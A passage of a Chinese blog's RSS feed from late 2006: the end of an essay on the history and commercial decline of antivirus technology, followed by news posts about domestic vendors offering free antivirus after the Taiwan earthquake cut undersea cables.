src="http://www.springbbs.com/blog/attachment/200701/1167663632_2.jpg" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><BR></DIV><BR><br/><DIV align=center><a href="http://www.springbbs.com/blog/attachment/200701/1167663632_3.jpg" target="_blank"><img src="http://www.springbbs.com/blog/attachment/200701/1167663632_3.jpg" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><BR></DIV><BR>由于AVP的技术成功，使得大量第三方AV产品使用AVP的引擎来工作，这里面知名的有F-Secure、AVK等。也有许多后来学习利用AVP 技术的产品，比如DR.Web，它是Igor Daniloff所领军打造的产品，这哥们也是一个顶尖逆向工程高手，而且很早以前他还经常在地下站点发表反病毒和逆向的相关文章，从对Drweb的老版本查看，我经常发现AVP的影子，连病毒库的结构，都有几分形似。<BR>这个时候的反病毒不仅在市场上大获全胜，赚了大把的票子，在用户的需求和市场的竞争下，技术上也成熟起来，具备了：<BR><br/><BLOCKQUOTE>1、高速的扫描/特征匹配算法。<BR>2、合理的病毒库，大量的病毒样本，完善的病毒清除方法。<BR>3、产品线全面，各种主流系统的兼容DOS/Win9x/Winnt/2000，NOVELL、LINUX/UNIX四处开花。<BR>4、以监控为主的防护概念普及和应用。<BR>5、启发扫描、虚拟机、人工智能全面应用。<BR>直到今天，这些技术依然是整个AV体制的坚石和基础，而今天AV技术的发展却缓慢鲜有创新。<BR></BLOCKQUOTE><BR><B>四、赚并堕落着</B><BR>没错，反病毒的今天已经开始了堕落，这种堕落体现在关键技术上的不思进取，市场上的尔虞我诈。反病毒商家的自我炒作，彼此炒作已经屡见不鲜。而由于基础反病毒技术的浅显化，使得大量的小手工作坊又一次涌现出来，这些手工作坊的产品不仅没有多少创意。而且它们这些良莠不齐的反病毒/反木马产品，混淆着用户的视听。<BR>在网络上，各个BBS中，你会发现N多人都在谈论病毒，整天谈论的就是怎么清除一个木马，木马又改注册表哪里啦？木马把文件拷贝到哪儿啦？TXT 文件关联是不是又被修改啦？等等，并觉得这就是技术，乐此不疲。我经常被人家这样问来问去，在某种意义上，我觉得这侮辱了反病毒技术，这个活儿应该叫客服!<BR>当然这种堕落也是病毒技术的堕落，初接触计算机那种对病毒的神秘感已经彻底消失，今天的病毒是看得见的，今天的病毒作者十有八九的不懂变形、多态，你看那几百K的木马，近1M的后门，形形色色的蠕虫和垃圾邮件们依靠操作系统漏洞、应用程序的BUG和对用户的社交工程欺骗来传播。<BR>反病毒公司这个年代大喜过望，因为几乎不用对抗那些诡异的病毒，传统的那些多态、变形的DOS/WIN9X病毒已经随着系统的变换成为昨日黄花，那个年代 AV做的再烂都已经无关紧要，新的平台给了大家站在同一个起跑线的机会。如今的商业反病毒公司面对木马几乎是居高临下的傲视，这让反病毒的公司的分析员多少有些无聊，是的，整天面对那些重复着、弱智的木马，那些单一的、垃圾的代码，生活变得那么乏味，没有激情，没有可敬的敌人，惺惺相惜的对手。病毒和反病毒从原来的曲高和寡，彻头彻尾的沦落为下里巴人。<BR>我们以前要面对的是这样一些天才：<BR><br/><DIV align=center><a href="http://www.springbbs.com/blog/attachment/200701/1167663688_0.jpg" target="_blank"><img src="http://www.springbbs.com/blog/attachment/200701/1167663688_0.jpg" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><BR></DIV>29/A成员，以Benny为首的29/A不少高手，写过许多非常具有创意的病毒、包括一些划时代的病毒，Benny是一个对技术执着的顶尖高手。值得一提的是：他虽然写了很多病毒，但他写的这些病毒仅仅是一种技术研究，事实上国内也有不少病毒高手，在默默研究病毒技术，以更深层次的技术交流为目的。有的高手还研究病毒技术的应用，包括针对爆发蠕虫的遏制。安全届最初找到通过PEB获取kernel.dll地址，从而获得ShellCode 使用API的方法时，人人叫好，而这却是被病毒高手们玩烂的技术。还有一些高手，自己写出来针对自己病毒的清除程序，原因仅仅是反病毒公司编写的清除模块不能检测和正常的清除病毒。您不信么？看看下面这段SMF病毒组织一个作者在自己的病毒清除工具包中的自述：<BR><br/><BLOCKQUOTE>From author:<BR>~~~~~~~~~~~~<BR>I write this program, because AV programs like AVP or DrWeb can't cure<BR>some of my virii :) Sorry, this version not tested archives and packed<BR>files. They test only COM/EXE files. Make report at dav.rep file.<BR>Detected all HLL-virii from DVL #3 - #4.<BR>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<BR></BLOCKQUOTE><BR><br/><DIV align=center><a href="http://www.springbbs.com/blog/attachment/200701/1167663688_1.jpg" target="_blank"><img src="http://www.springbbs.com/blog/attachment/200701/1167663688_1.jpg" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><BR></DIV>CIH作者，不管怎么说，陈赢豪的学习能力是值得敬佩的，因为在他写CIH之前不久，大约是两周，捷克的加密解密高手EliCZ刚刚公开自己的研究成果：通过IDT从Ring3切换到Ring0的方法，这个方法刚刚被披露没几天，就被陈赢豪创造性的应用在的病毒上。<BR>然而，今天我们对抗的却是这样一些所谓高手<BR><BR><br/><DIV align=center><a href="http://www.springbbs.com/blog/attachment/200701/1167663688_2.jpg" target="_blank"><img src="http://www.springbbs.com/blog/attachment/200701/1167663688_2.jpg" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><BR></DIV>Jeremy Jaynes是个百万富翁，也是个垃圾邮件发送高手，他雇佣人专门进行收费互联网垃圾邮件发送业务。<BR><BR><br/><DIV align=center><a href="http://www.springbbs.com/blog/attachment/200701/1167663688_3.jpg" target="_blank"><img src="http://www.springbbs.com/blog/attachment/200701/1167663688_3.jpg" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><BR></DIV>Jay Echouafni ，CEO，同时也是一个黑客，控制了傀儡网络进行给竞争对手DDOS攻击。<BR><BR><br/><DIV align=center><a href="http://www.springbbs.com/blog/attachment/200701/1167663688_4.jpg" target="_blank"><img src="http://www.springbbs.com/blog/attachment/200701/1167663688_4.jpg" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a><BR></DIV>Andrew Schwarmkoff 是俄罗斯一个黑客团体成员，善于自己改造木马/后门利用来发动社会工程学的钓鱼攻击。<BR>病毒和反病毒仿佛商量过似的，一起开始了赚钱，不同的是，病毒作者低调的赚钱，钻着法律的空子，依靠网络的不可控的现实。而反病毒公司则天经地义，明目张胆。<BR><BR><B>五、前路在哪里</B><BR>今天，似乎没有多少人对反病毒产品的未来进行探索。F-Prot已经不像当年那么风光无限，虽然它的启发扫描的逻辑依然被我所赞叹。卡巴斯基 (Kaspersky)独孤求败的寂寞和不能出世的无奈并不为多少外人所知。然而市场毕竟是市场，用户并不关心你的启发扫描模块的优劣。据我所知，有几个厂商的反病毒引擎，已经近4年几乎没有更新过，这些年惟一更新的就是不断的炒作。有的要求进步的公司则直接建立了研究室，你别以为这是独立探索最新反病毒技术的地方，事实上这是逆向先进反病毒产品，从而用来亦步亦趋的跟着学的研究室。<BR>每天都是一个变革的开始，给新生的力量带来了机会，Microsoft也正式的介入了这个领域，事实上在遥远的DOS年代Microsoft就染指了一次反病毒市场，那是个时候正好是免疫技术流行的时代，Microsoft错误的以为免疫技术足以应对各种病毒，于是CPAV一度在DOS下流传。然而天山派剑术的轻灵终究无法抵挡昆仑派内力的雄厚，所以Microsoft败得很惨。但Microsoft又是一个善于学习的商家，今天Anti- Spyware 、Windows OneCare 、Windows Defender 卷土重来，一波波态势逼人。<BR>而传闻中MS Anti-Spyware某次升级后会不小心删除Norton Antivirus，这是不是又预示一场不公平的竞争开始。<BR>未来在那里，谁又能看的清呢，于是笔者killer只好寻根一下历史，企图借历史一双慧眼去先知一下未来。现在看来，有所惑有所不惑，把酒夜话，一切尽在不言中。<BR><BR><B>Creditz：F-Secure，提供部分图片。</B><BR><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%258F%258D%25E7%2597%2585%25E6%25AF%2592" rel="tag">反病毒</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=antivirus" rel="tag">antivirus</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=virus" rel="tag">virus</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%258E%2586%25E5%258F%25B2" rel="tag">历史</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%258E%25B0%25E7%258A%25B6" rel="tag">现状</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%259C%25AA%25E6%259D%25A5" rel="tag">未来</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?347</link>
<title><![CDATA[地震,金山也终于免费了...]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Sat, 30 Dec 2006 02:31:08 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?347</guid> 
<description>
<![CDATA[ 
	<P>昨天说到瑞星和江民免费了,今天金山也按耐不住了,也发布了免费政策,免费一个月,加上本来的7天免费,一共可以免费37天.老用户的服务时间顺延37天.并写明:<B><FONT color=#0000ff>光缆不修复,免费不中断</FONT></B>.这个策略考虑了所有用户群体,不过貌似没有网络版,仅限个人版~</P><br/><P><a href="http://www.springbbs.com/blog/attachment/200612/1167445736_0.png" target="_blank"><img src="http://www.springbbs.com/blog/attachment/200612/1167445736_0.png" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a></P><br/><P>相关链接:<A href="http://www.duba.net/zt/free/" target=_blank><FONT color=#0000ff>金山毒霸全面免费,紧急救援</FONT></A></P><br/><P></P><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%259C%25B0%25E9%259C%2587" rel="tag">地震</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E4%25B8%25AD%25E6%2596%25AD" rel="tag">中断</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%2585%258D%25E8%25B4%25B9" rel="tag">免费</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E4%25B8%25AA%25E4%25BA%25BA%25E7%2589%2588" rel="tag">个人版</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E9%2587%2591%25E5%25B1%25B1" rel="tag">金山</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%25AF%2592%25E9%259C%25B8" rel="tag">毒霸</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?346</link>
<title><![CDATA[地震,江民也开始免费一个月...]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Fri, 29 Dec 2006 11:43:25 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?346</guid> 
<description>
<![CDATA[ 
	<P>中午才说瑞星免费一个月,紧跟着,江民也宣布免费一个使用江民2007杀毒软件,呵呵,国内三个里面目前就只有金山没有动静了~~~</P><br/><DIV class=quote><br/><DIV class=quote-title>引用</DIV><br/><DIV class=quote-content><br/><P>12月27日台湾海峡地震导致我国通向国外的几条越洋光缆断裂，受此影响，目前国内数量众多的安装国外杀毒软件的电脑用户无法正常升级病毒库，随时面临新病毒的威胁。12月29日，为了保障我国电脑用户的网络安全，国内最大的计算机反病毒软件供应商江民科技宣布，<FONT color=#ff0000>明日起面向所有无法升级的国外杀毒软件用户免费提供30天完全功能的KV2007，用户只需登陆江民网站下载安装即可立即使用。</FONT><BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;江民杀毒软件KV2007可有效清除20多万种的已知计算机病毒、蠕虫、木马、黑客程序、网页病毒、邮件病毒、脚本病毒等，全方位主动防御未知病毒，新增流氓软件清理功能。KV2007新推出新一代BOOTSCAN系统启动前杀毒功能，可以在系统登陆前全面清除恶性病毒。支持全中文菜单式操作，使用更方便，杀毒更彻底。新增可升级光盘启动杀毒功能，可在系统瘫痪状态下从光盘启动电脑并升级病毒库进行杀毒。江民杀毒软件KV2007具有反黑客、反木马、漏洞扫描、垃圾邮件识别、硬盘数据恢复、网银网游密码保护、IE助手、系统诊断、文件粉碎、可疑文件强力删除、反网络钓鱼等十二大功能，为保护互联网时代的电脑安全提供了完整的解决方案。<BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;业内人士分析，我国目前使用国外杀毒软件的用户数量十分巨大，而其中相当部分用户使用的产品升级服务器在国外，此次台海地震切断了国内用户的升级途径，将使这部分用户在新病毒面前束手无策，直接危害我国互联网的整体安全。国产杀毒厂商此次纷纷免费提供产品，给国外杀毒软件厂商解了围，也再一次体现了国产杀毒软件的本土化优势。<BR><BR>&nbsp;&nbsp;&nbsp;&nbsp;<FONT color=#ff0000>江民杀毒软件KV2007&nbsp;30天免费版下载地址：</FONT><BR>&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://ec.jiangmin.com/active/index.htm" target="_blank">http://ec.jiangmin.com/active/index.htm</a> </P></DIV></DIV><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%2585%258D%25E8%25B4%25B9" rel="tag">免费</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%25B1%259F%25E6%25B0%2591" rel="tag">江民</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=kv" rel="tag">kv</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%259C%25B0%25E9%259C%2587" rel="tag">地震</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?344</link>
<title><![CDATA[地震,瑞星杀毒免费一个月....]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Fri, 29 Dec 2006 05:38:52 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?344</guid> 
<description>
<![CDATA[ 
	<P>续昨日kaspersky率先在地震后推出了<FONT face=宋体 size=2><B><A href="http://www.kaspersky.com.cn/KL-AboutUs/news2006/12n/061228a.htm" target=_blank><FONT face=宋体 color=#0000ff size=2><B>地震专用Key,保障正版用户顺利启用</B></FONT></A></B>的举措后,今日瑞星公司也开始了新的举措,从今天开始,瑞星杀毒软件免费一个月,包括个人版和企业版用户在内.</FONT></P><br/><P><FONT face=宋体 size=2>消息如下:</FONT></P><br/><P><B>[快讯]</B>台湾地震致使海底光缆中断，由于许多国外杀毒软件在中国大陆地区没有升级服务器，使得数百万国内个人用户、数十万企业和政府局域网用户无法升级。根据中国电信和中国网通的消息，光缆被完全修复可能需要一个月的时间。</P><br/><P><B></B>瑞星安全专家分析，由于年底正是各种病毒肆虐的高峰，近一个月时间无法升级杀毒软件，几乎意味着用户的电脑完全向病毒和黑客敞开了大门，而如此庞大数量的电脑被病毒攻陷，则会变成巨大的病毒感染源和黑客攻击平台（BotNet），因此整个互联网都面临着瘫痪的危险。</P><br/><P><B></B>在这样的危急时刻，国内最大的信息安全厂商瑞星公司毅然作出重大决定：从2006年12月29日至2007年1月29日，<B>瑞星杀毒软件完全免费一个月</B>。如果届时海底光缆仍存在问题，瑞星将考虑延长免费使用期限。</P><br/><P><B></B>瑞星副总裁毛一丁表示，虽然该措施将导致瑞星公司的商业收益遭受重大损失，但是为了避免国内互联网出现灾难性的病毒肆虐，作为信息安全领域的领袖厂商，瑞星有责任、有义务承担起危机时刻的社会责任。</P><br/><P><B></B>目前，瑞星官方网站已经做好了充分的准备，国内所有用户都可以登陆瑞星网站，免费下载、使用瑞星杀毒软件。</P><br/><P><B>个人用户： <BR></B><BR><B></B>请登陆<A href="http://go.rising.com.cn/download/transfer.asp?ver=comp" target=_blank><U><FONT color=#800080><a href="http://go.rising.com.cn/download/transfer.asp?ver=comp" target="_blank">http://go.rising.com.cn/download/transfer.asp?ver=comp</a></FONT></U></A>,下载瑞星杀毒软件，登陆<A href="http://fw.rising.com.cn/download/transfer.asp?ver=comp" target=_blank><U><FONT color=#0000ff><a href="http://fw.rising.com.cn/download/transfer.asp?ver=comp" target="_blank">http://fw.rising.com.cn/download/transfer.asp?ver=comp</a></FONT></U></A>，下载瑞星个人防火墙，瑞星杀毒、防火墙组合版公用免费序列号：（<B><FONT color=#ff0000>产品序列号：CSA5V1-S7RJNG-EQV4S6-G8E200，用户ID：U2MZUAJ6QFVR</FONT></B>）。</P><br/><P><B>企业和政府用户（局域网）：<BR></B><BR><B></B>请登陆<A href="http://download.rising.com.cn/for_down/ravnetver/ravnet_setup.exe" target=_blank><U><FONT color=#0000ff><a href="http://download.rising.com.cn/for_down/ravnetver/ravnet_setup.exe" target="_blank">http://download.rising.com.cn/for_down/ravnetver/ravnet_setup.exe</a></FONT></U></A>，下载瑞星杀毒软件网络版免费使用。瑞星客户服务工程师将随时待命，为企业用户提供安装、设置等全程技术支持。瑞星杀毒软件网络版公用免费序列号：（<B><FONT color=#ff0000>1W9EVK-05RBUL-28W1S3-HCE208</FONT></B>）。</P><br/><P>链接:</P><br/><H2><FONT size=2><A href="http://it.rising.com.cn/Channels/Info/Rav_news/Rav_news/2006-12-29/1167368031d39646.shtml" target=_blank><br/><H2><FONT color=#0000ff size=2>地震使国外杀软无法升级 瑞星杀毒软件免费一个月</FONT></H2></A></FONT></H2><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%2591%259E%25E6%2598%259F" rel="tag">瑞星</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=kaspersky" rel="tag">kaspersky</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%259D%2580%25E6%25AF%2592%25E8%25BD%25AF%25E4%25BB%25B6" rel="tag">杀毒软件</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%2585%258D%25E8%25B4%25B9" rel="tag">免费</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E4%25BC%2581%25E4%25B8%259A%25E7%2589%2588" rel="tag">企业版</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E4%25B8%25AA%25E4%25BA%25BA%25E7%2589%2588" rel="tag">个人版</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E5%259C%25B0%25E9%259C%2587" rel="tag">地震</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E9%2580%259A%25E8%25AE%25AF" rel="tag">通讯</a>
]]>
</description>
</item><item>
<link>http://www.springbbs.com/blog/read.php?334</link>
<title><![CDATA[瑞星杀毒2007单机版 震撼发布...]]></title> 
<author>jeffchen88 &lt;webmaster@springbbs.com&gt;</author>
<category><![CDATA[资讯]]></category>
<pubDate>Tue, 05 Dec 2006 06:50:19 +0000</pubDate> 
<guid>http://www.springbbs.com/blog/read.php?334</guid> 
<description>
<![CDATA[ 
	<P>瑞星2007单机版可谓是姗姗来迟了...公测最早,公测时间最长,发布时间最晚,今天总算出炉,标题足足让人汗颜了一把"<B>世界级反病毒产品 瑞星杀毒软件2007全球发布</B>"...</P><br/><P>以下是瑞星首推的创新技术:</P><br/><P><a href="http://www.springbbs.com/blog/attachment/200612/1165300874_0.png" target="_blank"><img src="http://www.springbbs.com/blog/attachment/200612/1165300874_0.png" class="insertimage" alt="点击在新窗口中浏览此图片" title="点击在新窗口中浏览此图片" border="0"/></a> </P><br/><P>我还没有安装到正式版的瑞星07,也不知道到底个如何的好,不过至于这些技术,我觉得年年都如此,年年都要有主打的产品技术推荐,因此也不足为奇了.真正目前是否能很好的对付流氓和恶意软件已经成为当务之急,希望07版的瑞星在这个方面不会让人失望~~</P><br/><P>不过瑞星的脱壳引擎确实公测了蛮久了,第八带脱壳技术应该来说还是有很大程度的提高,这个来讲作为卖点是无可厚非的.至于那几个专利技术嘛,还是说算了...后面那些独占式抢先杀毒技术,漏洞攻击防火墙联动系统等等,这些名字确实蛮好听的,蛮吸引人的...</P><br/><P>最终如何,还得用了才能说好不好呀,但愿能有新的体验~~~</P><br/>Tags - <a href="http://www.springbbs.com/blog/tag.php?tag=%25E7%2591%259E%25E6%2598%259F2007" rel="tag">瑞星2007</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%259D%2580%25E6%25AF%2592%25E8%25BD%25AF%25E4%25BB%25B6" rel="tag">杀毒软件</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=antivirus" rel="tag">antivirus</a> , <a href="http://www.springbbs.com/blog/tag.php?tag=%25E6%25AD%25A3%25E5%25BC%258F%25E7%2589%2588" rel="tag">正式版</a>
]]>
</description>
</item>
</channel>
</rss>